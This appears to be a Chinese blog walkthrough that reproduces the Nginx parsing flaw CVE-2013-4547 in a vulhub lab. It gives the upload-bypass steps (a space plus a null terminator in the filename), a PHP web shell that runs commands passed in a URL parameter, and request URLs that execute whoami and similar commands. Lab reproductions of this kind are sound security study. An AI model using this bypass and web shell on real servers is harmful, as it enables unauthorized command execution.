Nginx文件解析漏洞复现:CVE-2013-4547

漏洞原理

CVE-2013-4547漏洞是由于非法字符空格和截止符导致Nginx在解析URL时的有限状态机混乱,导致攻击者可以通过一个非编码空格绕过后缀名限制。假设服务器中存在文件1. jpg,则可以通过改包访问让服务器认为访问的为PHP文件。

漏洞复现

开启靶场

进入/vulhub/nginx/CVE-2013-4547,启动靶场环境:

复制代码
docker-compose up -d

然后访问目标主机的8080端口

复制代码
http://192.168.61.131:8080/

演示

验证漏洞

先上传正常的png图片,发现上传成功并且会显示文件路径

试试上传php文件,会不让上传

上传带有php代码的png图片并且抓包,在文件名后添一个空格,看到返回包中显示了上传成功的文件

复制代码
<?php phpinfo(); ?>

访问shell.png

复制代码
http://192.168.61.131:8080/uploadfiles/shell.png...php

抓包把 ...php 前面的两个 . 改成一个空格一个截断符

漏洞利用

上传木马

复制代码
<?php
$a = $_GET["cmd"];
system($a);
?>

上传带有php代码的图片文件a.png,然后抓包后在文件名后加一个空,看到返回包显示了文件路径

然后访问下面路径,再进行抓包

复制代码
http://192.168.61.131:8080/uploadfiles/a.png...php?cmd=whoami

抓包把 ...php 前面的两个 . 改成一个空格一个截断符,发现返回包执行了whoami的命令

执行ls命令

执行id命令

执行ping命令

总结

这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。

CVE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

相关推荐
枷锁—sha12 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
larance16 小时前
Gunicorn + Nginx+systemd 配置flask
nginx·flask·gunicorn
文艺理科生Owen17 小时前
Nginx 路径映射深度解析:从本地开发到生产交付的底层哲学
运维·nginx
天荒地老笑话么19 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
kong79069281 天前
Nginx性能优化
java·nginx·性能优化
Harvey9031 天前
通过 Helm 部署 Nginx 应用的完整标准化步骤
linux·运维·nginx·k8s
大方子2 天前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha2 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络2 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd2 天前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell